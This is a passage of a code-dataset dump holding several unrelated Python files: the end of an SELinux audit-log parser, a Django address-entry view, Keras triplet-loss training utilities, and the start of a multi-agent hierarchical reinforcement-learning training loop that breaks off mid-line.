refpolicy.SecurityContext(fields[1])\n found_tgt = True\n elif fields[0] == \"tclass\":\n self.tclass = fields[1]\n found_class = True\n elif fields[0] == \"comm\":\n self.comm = fields[1][1:-1]\n elif fields[0] == \"exe\":\n self.exe = fields[1][1:-1]\n\n if not found_src or not found_tgt or not found_class or not found_access:\n raise ValueError(\"AVC message in invalid format [%s]\\n\" % self.message)\n \nclass PolicyLoadMessage(AuditMessage):\n \"\"\"Audit message indicating that the policy was reloaded.\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n\nclass DaemonStartMessage(AuditMessage):\n \"\"\"Audit message indicating that a daemon was started.\"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.auditd = False\n\n def 
from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n if \"auditd\" in recs:\n self.auditd = True\n \n\nclass ComputeSidMessage(AuditMessage):\n \"\"\"Audit message indicating that a sid was not valid.\n\n Compute sid messages are generated on attempting to create a security\n context that is not valid. Security contexts are invalid if the role is\n not authorized for the user or the type is not authorized for the role.\n\n This class does not store all of the fields from the compute sid message -\n just the type and role.\n \"\"\"\n def __init__(self, message):\n AuditMessage.__init__(self, message)\n self.type = \"\"\n self.role = \"\"\n\n def from_split_string(self, recs):\n AuditMessage.from_split_string(self, recs)\n dict={}\n for i in recs:\n t = i.split('=')\n if len(t) < 2:\n continue\n dict[t[0]]=t[1]\n try:\n self.role = refpolicy.SecurityContext(dict[\"scontext\"]).role\n self.type = refpolicy.SecurityContext(dict[\"tcontext\"]).type\n except:\n raise ValueError(\"Split string does not represent a valid compute sid message\")\n def output(self):\n return \"role %s types %s;\\n\" % (self.role, self.type)\n \n# Parser for audit messages\n\nclass AuditParser:\n \"\"\"Parser for audit messages.\n\n This class parses audit messages and stores them according to their message\n type. This is not a general purpose audit message parser - it only extracts\n selinux related messages.\n\n Each audit messages are stored in one of four lists:\n avc_msgs - avc denial or granted messages. Messages are stored in\n AVCMessage objects.\n comput_sid_messages - invalid sid messages. Messages are stored in\n ComputSidMessage objects.\n invalid_msgs - selinux related messages that are not valid. Messages\n are stored in InvalidMessageObjects.\n policy_load_messages - policy load messages. Messages are stored in\n PolicyLoadMessage objects.\n\n These lists will be reset when a policy load message is seen if\n AuditParser.last_load_only is set to true. 
It is assumed that messages\n are fed to the parser in chronological order - time stamps are not\n parsed.\n \"\"\"\n def __init__(self, last_load_only=False):\n self.__initialize()\n self.last_load_only = last_load_only\n\n def __initialize(self):\n self.avc_msgs = []\n self.compute_sid_msgs = []\n self.invalid_msgs = []\n self.policy_load_msgs = []\n self.path_msgs = []\n self.by_header = { }\n \n # Low-level parsing function - tries to determine if this audit\n # message is an SELinux related message and then parses it into\n # the appropriate AuditMessage subclass. This function deliberately\n # does not impose policy (e.g., on policy load message) or store\n # messages to make as simple and reusable as possible.\n #\n # Return values:\n # None - no recognized audit message found in this line\n #\n # InvalidMessage - a recognized but invalid message was found.\n #\n # AuditMessage (or subclass) - object representing a parsed\n # and valid audit message.\n def __parse_line(self, line):\n rec = line.split()\n for i in rec:\n found = False\n if i == \"avc:\" or i == \"message=avc:\" or i == \"msg='avc:\":\n msg = AVCMessage(line)\n found = True\n elif i == \"security_compute_sid:\":\n msg = ComputeSidMessage(line)\n found = True\n elif i == \"type=MAC_POLICY_LOAD\":\n msg = PolicyLoadMessage(line)\n found = True\n elif i == \"type=AVC_PATH\":\n msg = PathMessage(line)\n found = True\n elif i == \"type=DAEMON_START\":\n msg = DaemonStartMessage(list)\n found = True\n \n if found:\n try:\n msg.from_split_string(rec)\n except ValueError:\n msg = InvalidMessage(line)\n return msg\n return None\n\n # Higher-level parse function - take a line, parse it into an\n # AuditMessage object, and store it in the appropriate list.\n # This function will optionally reset all of the lists when\n # it sees a load policy message depending on the value of\n # self.last_load_only.\n def __parse(self, line):\n msg = self.__parse_line(line)\n if msg is None:\n return\n\n # Append to the 
correct list\n if isinstance(msg, PolicyLoadMessage):\n if self.last_load_only:\n self.__initialize()\n elif isinstance(msg, DaemonStartMessage):\n # We initialize every time the auditd is started. This\n # is less than ideal, but unfortunately it is the only\n # way to catch reboots since the initial policy load\n # by init is not stored in the audit log.\n if msg.auditd and self.last_load_only:\n self.__initialize()\n self.policy_load_msgs.append(msg)\n elif isinstance(msg, AVCMessage):\n self.avc_msgs.append(msg)\n elif isinstance(msg, ComputeSidMessage):\n self.compute_sid_msgs.append(msg)\n elif isinstance(msg, InvalidMessage):\n self.invalid_msgs.append(msg)\n elif isinstance(msg, PathMessage):\n self.path_msgs.append(msg)\n\n # Group by audit header\n if msg.header != \"\":\n if self.by_header.has_key(msg.header):\n self.by_header[msg.header].append(msg)\n else:\n self.by_header[msg.header] = [msg]\n \n\n # Post processing will add additional information from AVC messages\n # from related messages - only works on messages generated by\n # the audit system.\n def __post_process(self):\n for value in self.by_header.values():\n avc = []\n path = None\n for msg in value:\n if isinstance(msg, PathMessage):\n path = msg\n elif isinstance(msg, AVCMessage):\n avc.append(msg)\n if len(avc) > 0 and path:\n for a in avc:\n a.path = path.path\n\n def parse_file(self, input):\n \"\"\"Parse the contents of a file object. This method can be called\n multiple times (along with parse_string).\"\"\"\n line = input.readline()\n while line:\n self.__parse(line)\n line = input.readline()\n self.__post_process()\n\n def parse_string(self, input):\n \"\"\"Parse a string containing audit messages - messages should\n be separated by new lines. 
This method can be called multiple\n times (along with parse_file).\"\"\"\n lines = input.split('\\n')\n for l in lines:\n self.__parse(l)\n self.__post_process()\n\n def to_role(self, role_filter=None):\n \"\"\"Return list of SELINUX_ERR messages matching the specified filter\n\n Filter out types that match the filer, or all roles\n\n Params:\n role_filter - [optional] Filter object used to filter the\n output.\n Returns:\n Access vector set representing the denied access in the\n audit logs parsed by this object.\n \"\"\"\n roles = []\n if role_filter:\n for selinux_err in self.compute_sid_msgs:\n if role_filter.filter(selinux_err):\n roles.append(selinux_err)\n return roles\n return self.compute_sid_msgs\n\n def to_access(self, avc_filter=None, only_denials=True):\n \"\"\"Convert the audit logs access into a an access vector set.\n\n Convert the audit logs into an access vector set, optionally\n filtering the restults with the passed in filter object.\n\n Filter objects are object instances with a .filter method\n that takes and access vector and returns True if the message\n should be included in the final output and False otherwise.\n\n Params:\n avc_filter - [optional] Filter object used to filter the\n output.\n Returns:\n Access vector set representing the denied access in the\n audit logs parsed by this object.\n \"\"\"\n av_set = access.AccessVectorSet()\n for avc in self.avc_msgs:\n if avc.denial != True and only_denials:\n continue\n if avc_filter:\n if avc_filter.filter(avc):\n av_set.add(avc.scontext.type, avc.tcontext.type, avc.tclass,\n avc.accesses, avc)\n else:\n av_set.add(avc.scontext.type, avc.tcontext.type, avc.tclass,\n avc.accesses, avc)\n return av_set\n\nclass TypeFilter:\n def __init__(self, regex):\n self.regex = re.compile(regex)\n\n def filter(self, avc):\n if self.regex.match(avc.scontext.type):\n return True\n if self.regex.match(avc.tcontext.type):\n return True\n return 
False\n\n\n","sub_path":"images/lenny64-peon/usr/share/python-support/python-sepolgen/sepolgen/audit.py","file_name":"audit.py","file_ext":"py","file_size_in_byte":17463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"245696087","text":"from django.contrib import messages\nfrom django.shortcuts import render\nfrom webapp.exceptions import PTPValueError\nfrom webapp.manager import address_manager\nfrom webapp.view import GlobalErrorHandler\n\n__author__ = 'Gao Lei'\n\n\n@GlobalErrorHandler\ndef address_home(request, method, description):\n return render(request, 'address/address_home.html', {\n 'method': method,\n 'description': description,\n })\n\n\n@GlobalErrorHandler\ndef address_detail(request):\n postal_codes_string = request.POST['postal_codes'].strip()\n postal_codes = {item.strip() for item in postal_codes_string.split(',') if item.strip()}\n\n if not postal_codes:\n raise PTPValueError('Please input the bus postal codes that you want to add.')\n\n address_manager.postal_code_existing_check(postal_codes)\n\n return render(request, 'address/address_detail.html', {\n 'postal_codes': postal_codes,\n })\n\n\n@GlobalErrorHandler\ndef address_handler(request):\n address_count = int(request.POST['address_count'].strip())\n\n addresses = []\n for i in range(address_count):\n postal_code = request.POST['postal_code_%d' % i].strip()\n block = request.POST['block_%d' % i].strip()\n street_name = request.POST['street_name_%d' % i].strip()\n longitude = request.POST['longitude_%d' % i].strip()\n latitude = request.POST['latitude_%d' % i].strip()\n\n address = [postal_code, block, street_name, longitude, latitude]\n\n addresses.append(address)\n\n sql_name = address_manager.address_add(addresses)\n\n messages.info(request, 'SQL generated and executed on development database successfully.')\n request.attributes = {'sql_name': sql_name}\n\n return render(request, 
'common/result.html')","sub_path":"webapp/view/address_view.py","file_name":"address_view.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"193519547","text":"import os\nimport numpy as np\nnp.random.seed(0)\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.optimizers import Adam\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate, Dropout, Convolution2D\nfrom keras.models import Model\nfrom keras.datasets import cifar10\nfrom keras.datasets import mnist\n\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform,he_uniform\n\nfrom keras.engine.topology import Layer\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras.utils import plot_model,normalize\n\n\nnb_classes = 10\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef add_top(model):\n \n inp = model.get_input_at(0)\n x = model.layers[-1].output\n \n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n x = Dropout(dense_dropout)(x)\n x = Dense(num_classes)(x)\n x = Activation('softmax')(x)\n \n new_model = Model(inp, x)\n \n return new_model\n\n\ndef remove_top(model):\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n\n inp = model.input\n out = model.layers[-6].output\n\n network = Model(inp, out)\n \n return network\n\n# 
------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef buildDataSet(cifar=False):\n \"\"\"Build dataset for train and test\n \n \n returns:\n dataset : list of length 10 containing images for each classes of shape (?,28,28,1)\n \"\"\"\n \n if cifar:\n (x_train_origin, y_train_origin), (x_test_origin, y_test_origin) = cifar10.load_data()\n img_rows, img_cols, channels = 32, 32, 3\n input_shape = (img_rows, img_cols, channels)\n else:\n (x_train_origin, y_train_origin), (x_test_origin, y_test_origin) = mnist.load_data()\n img_rows, img_cols, channels = 28, 28, 1\n input_shape = (img_rows, img_cols, channels)\n \n \n assert K.image_data_format() == 'channels_last'\n x_train_origin = x_train_origin.reshape(x_train_origin.shape[0], img_rows, img_cols, channels)\n x_test_origin = x_test_origin.reshape(x_test_origin.shape[0], img_rows, img_cols, channels)\n \n dataset_train = []\n dataset_test = []\n \n #Sorting images by classes and normalize values 0=>1\n for n in range(nb_classes):\n images_class_n = np.asarray([row for idx,row in enumerate(x_train_origin) if y_train_origin[idx]==n])\n dataset_train.append(images_class_n/255.)\n \n images_class_n = np.asarray([row for idx,row in enumerate(x_test_origin) if y_test_origin[idx]==n])\n dataset_test.append(images_class_n/255.)\n \n return dataset_train, dataset_test, x_train_origin, y_train_origin, x_test_origin, y_test_origin\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# 
------------------------------------------------------------------------------------------------------------\n\nnb_classes = 10\nimg_rows, img_cols = 32, 32\ninput_shape = (img_rows, img_cols, 3)\n\ndataset_train, dataset_test, x_train_origin, y_train_origin, x_test_origin, y_test_origin = buildDataSet(cifar=True)\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\nclass TripletLossLayer(Layer):\n def __init__(self, alpha, **kwargs):\n self.alpha = alpha\n super(TripletLossLayer, self).__init__(**kwargs)\n \n \n def triplet_loss(self, inputs):\n anchor, positive, negative = inputs\n p_dist = K.sum(K.square(anchor-positive), axis=-1)\n n_dist = K.sum(K.square(anchor-negative), axis=-1)\n return K.sum(K.maximum(p_dist - n_dist + self.alpha, 0), axis=0)\n \n '''\n def triplet_loss(self, inputs):\n anchor, positive, negative = inputs\n p_dist = K.sqrt(K.sum(K.square(anchor-positive), axis=-1))\n n_dist = K.sqrt(K.sum(K.square(anchor-negative), axis=-1))\n return K.sum(K.maximum((p_dist - n_dist + self.alpha)/64.0, 0), axis=0)\n '''\n \n def call(self, inputs):\n loss = self.triplet_loss(inputs)\n self.add_loss(loss)\n return loss\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef build_model(input_shape, network, margin=0.2):\n '''\n Define the Keras Model for training \n Input : \n input_shape : shape of input images\n network : Neural network to train outputing embeddings\n margin : minimal 
distance between Anchor-Positive and Anchor-Negative for the lossfunction (alpha)\n \n '''\n # Define the tensors for the three input images\n anchor_input = Input(input_shape, name=\"anchor_input\")\n positive_input = Input(input_shape, name=\"positive_input\")\n negative_input = Input(input_shape, name=\"negative_input\") \n \n # Generate the encodings (feature vectors) for the three images\n encoded_a = network(anchor_input)\n encoded_p = network(positive_input)\n encoded_n = network(negative_input)\n \n #TripletLoss Layer\n loss_layer = TripletLossLayer(alpha=margin,name='triplet_loss_layer')([encoded_a,encoded_p,encoded_n])\n \n # Connect the inputs with the outputs\n network_train = Model(inputs=[anchor_input,positive_input,negative_input],outputs=loss_layer)\n \n # return the model\n return network_train\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef get_batch_random(batch_size,s=\"train\"):\n \"\"\"\n Create batch of APN triplets with a complete random strategy\n \n Arguments:\n batch_size -- integer \n\n Returns:\n triplets -- list containing 3 tensors A,P,N of shape (batch_size,w,h,c)\n \"\"\"\n if s == 'train':\n X = dataset_train\n else:\n X = dataset_test\n\n m, w, h,c = X[0].shape\n \n \n # initialize result\n triplets=[np.zeros((batch_size,h, w,c)) for i in range(3)]\n \n for i in range(batch_size):\n #Pick one random class for anchor\n anchor_class = np.random.randint(0, nb_classes)\n nb_sample_available_for_class_AP = X[anchor_class].shape[0]\n \n #Pick two different random pics for this class => A and P\n [idx_A,idx_P] = np.random.choice(nb_sample_available_for_class_AP,size=2,replace=False)\n \n #Pick another class for N, different from anchor_class\n 
negative_class = (anchor_class + np.random.randint(1,nb_classes)) % nb_classes\n nb_sample_available_for_class_N = X[negative_class].shape[0]\n \n #Pick a random pic for this negative class => N\n idx_N = np.random.randint(0, nb_sample_available_for_class_N)\n\n triplets[0][i,:,:,:] = X[anchor_class][idx_A,:,:,:]\n triplets[1][i,:,:,:] = X[anchor_class][idx_P,:,:,:]\n triplets[2][i,:,:,:] = X[negative_class][idx_N,:,:,:]\n\n return triplets\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef compute_dist(a,b):\n return np.sum(np.square(a-b))\n\ndef get_batch_hard(draw_batch_size,hard_batchs_size,norm_batchs_size,network,s=\"train\"):\n \"\"\"\n Create batch of APN \"hard\" triplets\n \n Arguments:\n draw_batch_size -- integer : number of initial randomly taken samples \n hard_batchs_size -- interger : select the number of hardest samples to keep\n norm_batchs_size -- interger : number of random samples to add\n\n Returns:\n triplets -- list containing 3 tensors A,P,N of shape (hard_batchs_size+norm_batchs_size,w,h,c)\n \"\"\"\n if s == 'train':\n X = dataset_train\n else:\n X = dataset_test\n\n m, w, h,c = X[0].shape\n \n \n #Step 1 : pick a random batch to study\n studybatch = get_batch_random(draw_batch_size,s)\n \n #Step 2 : compute the loss with current network : d(A,P)-d(A,N). 
The alpha parameter here is omited here since we want only to order them\n studybatchloss = np.zeros((draw_batch_size))\n \n #Compute embeddings for anchors, positive and negatives\n A = network.predict(studybatch[0])\n P = network.predict(studybatch[1])\n N = network.predict(studybatch[2])\n \n #Compute d(A,P)-d(A,N)\n studybatchloss = np.sum(np.square(A-P),axis=1) - np.sum(np.square(A-N),axis=1)\n \n #Sort by distance (high distance first) and take the \n selection = np.argsort(studybatchloss)[::-1][:hard_batchs_size]\n \n #Draw other random samples from the batch\n selection2 = np.random.choice(np.delete(np.arange(draw_batch_size),selection),norm_batchs_size,replace=False)\n \n selection = np.append(selection,selection2)\n \n triplets = [studybatch[0][selection,:,:,:], studybatch[1][selection,:,:,:], studybatch[2][selection,:,:,:]]\n \n return triplets\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef compute_probs(network,X,Y):\n '''\n Input\n network : current NN to compute embeddings\n X : tensor of shape (m,w,h,1) containing pics to evaluate\n Y : tensor of shape (m,) containing true class\n \n Returns\n probs : array of shape (m,m) containing distances\n \n '''\n m = X.shape[0]\n nbevaluation = int(m*(m-1)/2)\n probs = np.zeros((nbevaluation))\n y = np.zeros((nbevaluation))\n \n #Compute all embeddings for all pics with current network\n embeddings = network.predict(X)\n \n size_embedding = embeddings.shape[1]\n \n #For each pics of our dataset\n k = 0\n for i in range(m):\n #Against all other images\n for j in range(i+1,m):\n #compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes\n probs[k] = 
-compute_dist(embeddings[i,:],embeddings[j,:])\n if (Y[i]==Y[j]):\n y[k] = 1\n else:\n y[k] = 0\n k += 1\n return probs,y\n\ndef compute_metrics(probs,yprobs):\n '''\n Returns\n fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]\n tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].\n thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1\n auc : Area Under the ROC Curve metric\n '''\n # calculate AUC\n auc = roc_auc_score(yprobs, probs)\n # calculate roc curve\n fpr, tpr, thresholds = roc_curve(yprobs, probs)\n \n return fpr, tpr, thresholds,auc\n\ndef compute_interdist(network):\n '''\n Computes sum of distances between all classes embeddings on our reference test image: \n d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... 
d(8,9)\n A good model should have a large distance between all theses embeddings\n \n Returns:\n array of shape (nb_classes,nb_classes) \n '''\n res = np.zeros((nb_classes,nb_classes))\n \n ref_images = np.zeros((nb_classes,img_rows,img_cols,1))\n \n #generates embeddings for reference images\n for i in range(nb_classes):\n ref_images[i,:,:,:] = dataset_test[i][0,:,:,:]\n ref_embeddings = network.predict(ref_images)\n \n for i in range(nb_classes):\n for j in range(nb_classes):\n res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])\n return res\n \ndef find_nearest(array,value):\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return array[idx-1],idx-1\n else:\n return array[idx],idx\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\n\n","sub_path":"custom_lib/triplet_utils.py","file_name":"triplet_utils.py","file_ext":"py","file_size_in_byte":14483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"86579889","text":"import numpy as np\nimport random, time\n\nfrom tester.tester import Tester\nfrom Agent.ihrl_agent import IhrlAgent\nfrom Environments.rendezvous.gridworld_env import GridWorldEnv\nfrom Environments.rendezvous.multi_agent_gridworld_env import MultiAgentGridWorldEnv\nfrom 
Environments.coop_buttons.multi_agent_buttons_env import MultiAgentButtonsEnv\nimport matplotlib.pyplot as plt\nimport math\n\ndef run_ihrl_training(epsilon,\n tester,\n agent_list,\n show_print=True):\n \"\"\"\n This code runs one i-hrl training episode. q-functions, and accumulated reward values of agents\n are updated accordingly. If the appropriate number of steps have elapsed, this function will\n additionally run a test episode.\n\n Parameters\n ----------\n epsilon : float\n Numerical value in (0,1) representing likelihood of choosing a random action.\n tester : Tester object\n Object containing necessary information for current experiment.\n agent_list : list of Agent objects\n Agent objects to be trained and tested.\n show_print : bool\n Optional flag indicating whether or not to print output statements to terminal.\n \"\"\"\n # Initializing parameters and the game\n learning_params = tester.learning_params\n testing_params = tester.testing_params\n \n num_agents = len(agent_list)\n if tester.experiment == 'rendezvous':\n training_env = MultiAgentGridWorldEnv(tester.rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n training_env = MultiAgentButtonsEnv(tester.rm_test_file, num_agents, tester.env_settings)\n\n for i in range(num_agents):\n agent_list[i].reset_state()\n agent_list[i].reset_option()\n\n s_team = np.full(num_agents, -1, dtype=int)\n a_team = np.full(num_agents, -1, dtype=int)\n testing_reward = 0\n\n mc_rewards = dict()\n for i in range(num_agents):\n mc_rewards[i] = []\n\n num_steps = learning_params.max_timesteps_per_task\n\n for t in range(num_steps):\n # Update step count\n tester.add_step()\n\n for i in range(num_agents):\n if t == 0:\n current_meta_state = training_env.get_meta_state(i)\n avail_meta_action_indeces = training_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, epsilon, learning_params)\n 
agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = training_env.get_meta_state(i)\n agent_list[i].option_complete = False\n\n if agent_list[i].option_complete:\n # Update the meta controller\n option_start_state = agent_list[i].option_start_state\n current_meta_state = training_env.get_meta_state(i)\n meta_action = agent_list[i].options_list.index(agent_list[i].current_option)\n agent_list[i].update_meta_q_function(option_start_state, current_meta_state, meta_action, mc_rewards[i], learning_params)\n\n # choose the next meta action\n avail_meta_action_indeces = training_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, epsilon, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = current_meta_state\n agent_list[i].option_complete = False\n mc_rewards[i] = []\n\n # Perform a team step\n for i in range(num_agents):\n s = agent_list[i].s\n s_team[i] = s\n a_team[i] = agent_list[i].get_next_action(epsilon, learning_params)\n\n r, _, s_team_next = training_env.environment_step(s_team, a_team)\n\n for i in range(num_agents):\n mc_rewards[i].append(r)\n\n completed_options = training_env.get_completed_options(s_team_next)\n\n for i in range(num_agents):\n # a = training_env.get_last_action(i)\n avail_options = training_env.get_avail_options(i)\n agent_list[i].update_agent(s_team_next[i], avail_options, a_team[i], r, completed_options, learning_params, update_q_function=True)\n if agent_list[i].current_option in completed_options:\n agent_list[i].option_complete = True\n\n # If enough steps have elapsed, test and save the performance of the agents.\n if testing_params.test and tester.get_current_step() % testing_params.test_freq == 0:\n t_init = time.time()\n step = tester.get_current_step()\n\n agent_list_copy = []\n\n # Need to create a copy of the agent for 
testing. If we pass the agent directly\n # mid-episode to the test function, the test will reset the world-state and reward machine \n # state before the training episode has been completed.\n for i in range(num_agents):\n options_list = agent_list[i].options_list\n s_i = agent_list[i].s_i\n num_states = agent_list[i].num_states\n num_meta_states = agent_list[i].num_meta_states\n actions = agent_list[i].actions\n agent_id = agent_list[i].agent_id\n agent_copy = IhrlAgent(options_list, s_i, num_states, num_meta_states, actions, agent_id)\n # Pass only the q-functions by reference so that the testing updates the original agent's q-function.\n agent_copy.q_dict = agent_list[i].q_dict\n agent_copy.meta_q = agent_list[i].meta_q\n\n agent_list_copy.append(agent_copy)\n\n # Run a test of the performance of the agents\n testing_reward, trajectory, testing_steps = run_ihrl_test(agent_list_copy,\n tester,\n learning_params,\n testing_params,\n show_print=show_print)\n \n if 0 not in tester.results.keys():\n tester.results[0] = {}\n if step not in tester.results[0]:\n tester.results[0][step] = []\n tester.results[0][step].append(testing_reward)\n\n # Save the testing trace\n if 'trajectories' not in tester.results.keys():\n tester.results['trajectories'] = {}\n if step not in tester.results['trajectories']:\n tester.results['trajectories'][step] = []\n tester.results['trajectories'][step].append(trajectory)\n\n # Save how many steps it took to complete the task\n if 'testing_steps' not in tester.results.keys():\n tester.results['testing_steps'] = {}\n if step not in tester.results['testing_steps']:\n tester.results['testing_steps'][step] = []\n tester.results['testing_steps'][step].append(testing_steps)\n\n if len(tester.steps) == 0 or tester.steps[-1] < step:\n tester.steps.append(step)\n\n # If the task is complete, update the meta controllers and stop trying to complete it.\n env_rm_state = training_env.u\n if training_env.reward_machine.is_terminal_state(env_rm_state):\n 
for i in range(num_agents):\n # Update the meta controller\n option_start_state = agent_list[i].option_start_state\n current_meta_state = training_env.get_meta_state(i)\n meta_action = agent_list[i].options_list.index(agent_list[i].current_option)\n agent_list[i].update_meta_q_function(option_start_state, current_meta_state, meta_action, mc_rewards[i], learning_params)\n \n # Make sure we've run at least the minimum number of training steps before breaking the loop\n if tester.stop_task(t):\n break\n\n # checking the steps time-out\n if tester.stop_learning():\n break\n\ndef run_ihrl_test(agent_list,\n tester,\n learning_params,\n testing_params,\n show_print=True):\n \"\"\"\n Run a test of the hrl method with the current q-function. \n\n Parameters\n ----------\n agent_list : list of Agent objects\n Agent objects to be trained and tested.\n tester : Tester object\n Object containing necessary information for current experiment.\n learning_params : LearningParameters object\n Object storing parameters to be used in learning.\n Testing_params : TestingParameters object\n Object storing parameters to be used in testing.\n show_print : bool\n Optional flag indicating whether or not to print output statements to terminal.\n\n Ouputs\n ------\n testing_reard : float\n Reward achieved by agent during this test episode.\n trajectory : list\n List of dictionaries containing information on current step of test.\n step : int\n Number of testing steps required to complete the task.\n \"\"\"\n num_agents = len(agent_list)\n if tester.experiment == 'rendezvous':\n testing_env = MultiAgentGridWorldEnv(tester.rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n testing_env = MultiAgentButtonsEnv(tester.rm_test_file, num_agents, tester.env_settings)\n\n for i in range(num_agents):\n agent_list[i].reset_state()\n agent_list[i].reset_option()\n\n s_team = np.full(num_agents, -1, dtype=int)\n a_team = np.full(num_agents, -1, dtype=int)\n 
testing_reward = 0\n\n mc_rewards = dict()\n for i in range(num_agents):\n mc_rewards[i] = []\n\n trajectory = []\n step = 0\n\n # agent_list[0].meta_q[:,0] = 1\n # agent_list[0].meta_q[0,0] = 0\n # agent_list[0].meta_q[0,1] = 1\n # agent_list[0].meta_q[7,0] = 0\n # agent_list[0].meta_q[7,2] = 1\n\n # agent_list[1].meta_q[:,0] = 1\n # agent_list[1].meta_q[1,0] = 0\n # agent_list[1].meta_q[1,1] = 1\n # agent_list[1].meta_q[3,0] = 0\n # agent_list[1].meta_q[3,2] = 1\n\n # agent_list[2].meta_q[:,0] = 1\n # agent_list[2].meta_q[3,0] = 0\n # agent_list[2].meta_q[3,1] = 1\n\n # Starting interaction with the environment\n for t in range(testing_params.num_steps):\n step = step + 1\n\n for i in range(num_agents):\n if t == 0:\n current_meta_state = testing_env.get_meta_state(i)\n avail_meta_action_indeces = testing_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, -1, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = testing_env.get_meta_state(i)\n agent_list[i].option_complete = False\n\n if agent_list[i].option_complete:\n # choose the next meta action\n current_meta_state = testing_env.get_meta_state(i)\n avail_meta_action_indeces = testing_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, -1, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = current_meta_state\n agent_list[i].option_complete = False\n mc_rewards[i] = []\n\n # print('Meta sate: {}, Agent 1: {}, Agent 2: {}, Agent 3: {}'.format(testing_env.get_meta_state(1), agent_list[0].current_option, agent_list[1].current_option, agent_list[2].current_option))\n\n # Perform a team step\n for i in range(num_agents):\n s = agent_list[i].s\n s_team[i] = s\n a_team[i] = 
agent_list[i].get_next_action(-1.0, learning_params)\n\n # trajectory.append({'s' : np.array(s_team, dtype=int), 'a' : np.array(a_team, dtype=int), 'meta_state': testing_env.get_meta_state(i)})\n\n r, _, s_team_next = testing_env.environment_step(s_team, a_team)\n testing_reward = testing_reward + r\n\n for i in range(num_agents):\n mc_rewards[i].append(r)\n\n completed_options = testing_env.get_completed_options(s_team_next)\n\n for i in range(num_agents):\n # a = testing_env.get_last_action(i)\n avail_options = testing_env.get_avail_options(i)\n agent_list[i].update_agent(s_team_next[i], avail_options, a_team[i], r, completed_options, learning_params, update_q_function=False)\n if agent_list[i].current_option in completed_options:\n agent_list[i].option_complete = True\n\n # If the task is complete, update all meta controllers and stop trying to complete it.\n env_rm_state = testing_env.u\n if testing_env.reward_machine.is_terminal_state(env_rm_state):\n break\n\n if show_print:\n print('Reward of {} achieved in {} steps. 
